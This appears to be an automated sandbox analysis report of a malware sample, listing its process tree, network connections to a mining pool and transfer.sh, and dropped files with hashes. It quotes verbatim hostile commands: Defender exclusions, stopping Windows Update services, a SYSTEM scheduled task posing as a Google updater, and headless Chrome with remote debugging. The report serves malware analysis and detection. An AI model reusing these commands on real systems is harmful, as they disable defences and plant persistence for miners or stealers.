PID 2936 wrote to memory of 1692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe

"C:\Users\Admin\AppData\Local\Temp\d6448d3082b315cf8dfa2dbbd9962b2c.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {0A1773F5-AA0B-44BE-A47E-B87C8D40CCAC} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=57076 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataQVQ0U" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef6f99758,0x7fef6f99768,0x7fef6f99778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=836 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1216 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=57076 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1508 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=57076 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1840 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=57076 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1988 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=57076 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2548 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=57076 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2644 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=57076 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2764 --field-trial-handle=1004,i,16601812060154022238,15714912122385260681,131072 --disable-features=PaintHolding /prefetch:1

Network

Country Destination Domain Proto
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ogs.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 apis.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.250.179.206:443 play.google.com tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
NL 142.250.179.206:443 play.google.com udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.251.36.22:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 142.250.179.141:443 accounts.google.com udp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.36.2:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp

Files

memory/3020-55-0x0000000002430000-0x0000000002530000-memory.dmp

memory/3020-56-0x0000000000220000-0x000000000025F000-memory.dmp

memory/3020-57-0x0000000003D90000-0x0000000003DC8000-memory.dmp

memory/3020-58-0x0000000000400000-0x00000000022FC000-memory.dmp

memory/3020-59-0x0000000006730000-0x0000000006770000-memory.dmp

memory/3020-60-0x00000000745C0000-0x0000000074CAE000-memory.dmp

memory/3020-61-0x0000000002340000-0x0000000002374000-memory.dmp

memory/3020-62-0x0000000003CF0000-0x0000000003CF6000-memory.dmp

memory/3020-63-0x0000000006730000-0x0000000006770000-memory.dmp

memory/3020-64-0x0000000002430000-0x0000000002530000-memory.dmp

memory/3020-66-0x0000000006730000-0x0000000006770000-memory.dmp

memory/3020-67-0x00000000745C0000-0x0000000074CAE000-memory.dmp

memory/3020-68-0x0000000006730000-0x0000000006770000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabBB17.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\TarBC23.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 646bf18dcccebc495fda57a3e80ebddc
SHA1 ac316482ec55d932034c8cf57bb232cce942b501
SHA256 52531fcdcb4777717036e5bdd30f46d9efc7a4055e6df997b8db7a768069ef2e
SHA512 386e0856a2f147a9e5ad229e3fe6eadb475ae6d792fb0c7fc0ccfc7d9f8459701f837add8882051f13c341d626d0a5d05391bf3a20659c5a69d0067bae676369

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2208-158-0x0000000003640000-0x0000000004866000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2688-160-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-161-0x00000000777B0000-0x0000000077959000-memory.dmp

memory/2688-162-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-163-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-164-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-165-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-166-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-167-0x000000013FC90000-0x0000000140EB6000-memory.dmp

memory/2688-169-0x000000013FC90000-0x0000000140EB6000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2208-176-0x0000000003640000-0x0000000004866000-memory.dmp

memory/3020-177-0x000000000DC10000-0x000000000DE9B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2696-178-0x0000000000900000-0x0000000000B8B000-memory.dmp

memory/2688-179-0x00000000777B0000-0x0000000077959000-memory.dmp

memory/2696-180-0x0000000000900000-0x0000000000B8B000-memory.dmp

memory/1828-181-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1828-182-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1828-188-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1828-190-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1828-191-0x0000000000400000-0x0000000000527000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1828-194-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-197-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-198-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-196-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-195-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-199-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-200-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-201-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-203-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-204-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-202-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-206-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-205-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-208-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-207-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-210-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-211-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-209-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-213-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-214-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-212-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-215-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-217-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-216-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-218-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-219-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-220-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-221-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-223-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-222-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-224-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-225-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-226-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-227-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-231-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-230-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-229-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1828-233-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-232-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-234-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1828-268-0x00000000779AF000-0x00000000779B0000-memory.dmp

memory/2608-276-0x000000001B230000-0x000000001B512000-memory.dmp

memory/2608-277-0x0000000002320000-0x0000000002328000-memory.dmp

memory/2608-279-0x000000000272B000-0x0000000002792000-memory.dmp

memory/2608-281-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

memory/2608-282-0x0000000002724000-0x0000000002727000-memory.dmp

memory/2608-280-0x000007FEF5A50000-0x000007FEF63ED000-memory.dmp

memory/2696-283-0x0000000000900000-0x0000000000B8B000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 8bbc60b19f1ddc47d63658f713af1d4d
SHA1 d85aadafd31b766ba4ec615b852c8441759a93b7
SHA256 29963e27f51a11c65e6c8cd1f432f376983d2fd28fca8d1e43e4b471ea66d190
SHA512 f0a3f3a9f239a7fcbf54216efa98700df919c2ea64394f323dbd8a28e4336e542d3751032dce68f9f007eb51131124be53f1e00c5b49d4aaf438d9b60cbe8f8a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JU68DFTE78MQX3KOWJYT.temp

MD5 8bbc60b19f1ddc47d63658f713af1d4d
SHA1 d85aadafd31b766ba4ec615b852c8441759a93b7
SHA256 29963e27f51a11c65e6c8cd1f432f376983d2fd28fca8d1e43e4b471ea66d190
SHA512 f0a3f3a9f239a7fcbf54216efa98700df919c2ea64394f323dbd8a28e4336e542d3751032dce68f9f007eb51131124be53f1e00c5b49d4aaf438d9b60cbe8f8a

memory/2764-291-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2764-290-0x000000001B390000-0x000000001B672000-memory.dmp

memory/2764-293-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

memory/2764-292-0x0000000002800000-0x0000000002880000-memory.dmp

memory/2764-296-0x0000000002800000-0x0000000002880000-memory.dmp

memory/2764-295-0x0000000002800000-0x0000000002880000-memory.dmp

memory/2764-294-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

memory/2764-297-0x0000000002800000-0x0000000002880000-memory.dmp

memory/2764-298-0x000007FEF50B0000-0x000007FEF5A4D000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2688-302-0x00000000777B0000-0x0000000077959000-memory.dmp

memory/2688-303-0x000000013FC90000-0x0000000140EB6000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Program Files\Google\Chrome\updater.exe

